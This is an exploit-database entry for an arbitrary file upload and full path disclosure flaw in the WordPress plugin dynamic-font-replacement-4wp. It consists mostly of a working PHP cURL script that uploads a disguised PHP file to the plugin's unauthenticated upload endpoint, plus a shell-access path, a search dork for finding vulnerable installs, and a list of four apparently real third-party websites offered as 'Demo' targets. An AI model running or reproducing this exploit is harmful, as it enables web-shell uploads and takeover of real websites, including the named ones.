Wordpress plugin dynamic-font-replacement-4wp Arbitrary File Upload

2013-02-05T00:00:00
ID 1337DAY-ID-20299
Type zdt
Reporter The Black Devils
Modified 2013-02-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Wordpress plugin dynamic-font-replacement-4wp Arbitrary File Upload /FPD Vulnerability
# Date: 21/01/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ webapps ]
# Dork : inurl:wp-content/plugins/dynamic-font-replacement-4wp
# Type : php
# Tested on: [Windows] & [Ubuntu]
#------------------
Upload 

<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/wp-content/plugins/dynamic-font-replacement-4wp/admin/cyber.gif.php
<?php
phpinfo();
?>

FULL PATH Discolure

http://localhost/wp-content/plugins/dynamic-font-replacement-4wp/admin/filedelete.php
#------------------
Demo 
http://charlestonsole.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php
http://www.dogstarcharleston.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php
http://www.gameworldone.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php
http://kroekerfarms.com/wp-content/plugins/dynamic-font-replacement-4wp/admin/upload2.php


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2018-04-01]  #